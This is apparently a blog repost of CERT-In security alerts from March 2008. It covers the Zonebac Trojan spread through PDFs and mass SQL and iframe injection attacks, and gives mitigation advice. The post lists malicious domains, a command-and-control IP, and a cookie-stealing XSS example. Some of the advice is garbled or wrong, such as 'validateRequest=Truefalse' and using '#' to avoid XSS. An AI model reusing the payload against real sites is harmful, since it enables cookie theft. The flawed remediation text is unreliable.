Master of Earth - March 2008 Security Alerts

In March 2008, Following Security Alerts were given by CERT-IN:

Issue Date	Security Alert	Description
13 March 2008	ZONEBAC TROJAN	It is being propagated via malicious PDF files exploiting recently disclosed vulnerabilities in Adobe Reader/Acrobat described in CIAD-2008-09 [Multiple vulnerabilities in Adobe Reader/Acrobat]. A user could be tricked to open the malicious PDF file 1.pdf via compromised advertisements appearing on legitimate Web sites or compromised Web pages containing IFRAME or JavaScript which redirects user’s browser to the malicious PDF file. It could also arrive as an attachment/link in spam emails. When user unknowingly executes this PDF file, the Trojan Zonebac is dropped onto the user’s system. Upon execution the Trojan scans the infected system for collecting the information related to the running applications and replace certain registry files by a copy of itself keeping the same filename to avoid its detection. After successful installation the Trojan lowers security.
17 March 2008	Mass SQL Injection attacks and malicious JavaScript embedding on websites	Various websites have been infected with malicious JavaScript file hosted on domain 2117966.net. Remote attackers are launching a SQL injection attacks against web servers running ASP and embedding a link (www DOT 21179 66 DOT net/fuckjp DOT js) to malicious JavaScript file on these websites. When a user visits the infected websites, the code gets executed onto the user's system. Upon execution it tries to exploit several known vulnerabilities on the victim system to download some password stealing malware. The downloaded malware tries to make outbound connections to IP address 61.188.39.175 on port 2034. It has also been reported that mass attacks were launched against websites running phpBB through IFrame Injection redirecting innocent users to malicious websites. Subsequently mass IFrame and JavaScript injection attacks have been reported using malicious domains www DOT nmidahena DOT com.

SOLUTIONS:

Sl. No.	Security Alert	Description
1	ZONEBAC TROJAN	* Do not click/open the links/attachments provided in untrusted email messages. * Remain cautious while visiting trusted / untrusted websites. * Search for the malicious files and processes created/initiated by Zonebac Trojan and delete the same. * Search for the registry entries mentioned above made by the Zonebac Trojan and delete the same. * Apply update as mentioned in Advisory of Adobe for the above mentioned vulnerabilities: http://www.adobe.com/support/security/advisories/apsa08-01.html * Keep up-to-date patches and fixes on the operating system and application software. * Keep up-to-date Antivirus and Antispyware signatures.
2	Mass SQL Injection attacks & malicious JavaScript embedding on websites	Website administrators: * Enable request validation by setting validateRequest=Truefalse in the Page directive or in the configuration section. * Input Filtering: Properly sanitize user input data. * Comment out malicious code: any scripting content to be “safely” commented out. * Avoid cross-site scripting appending in URLs by using some special character like #, etc. http://www.vulnerable.site/welcome.html#name=<script>alert(document.cookie) <script> * Output Filtering: Filter user data when it is sent back to the user’s browser. * Disable client side scripting. * Use Signed Scripting: Implement “signed scripting” such that any script with an invalid or un-trusted signature would not run automatically. System Administrators and Users: * Block access to domains “www DOT 2117966 DOT net” and "www DOT nmidahena DOT com" at gateway. * Disable Javascript and ActiveX scripting in the browser settings. Use NoScript extension with Firefox browser. * Block traffic to and from the IP address 61.188.39.175 * Apply the patches for the above mentioned vulnerabilities. * Keep up-to-date on patches and fixes on the OS and application software. * Install and maintain updated anti-virus software at gateway and desktop level.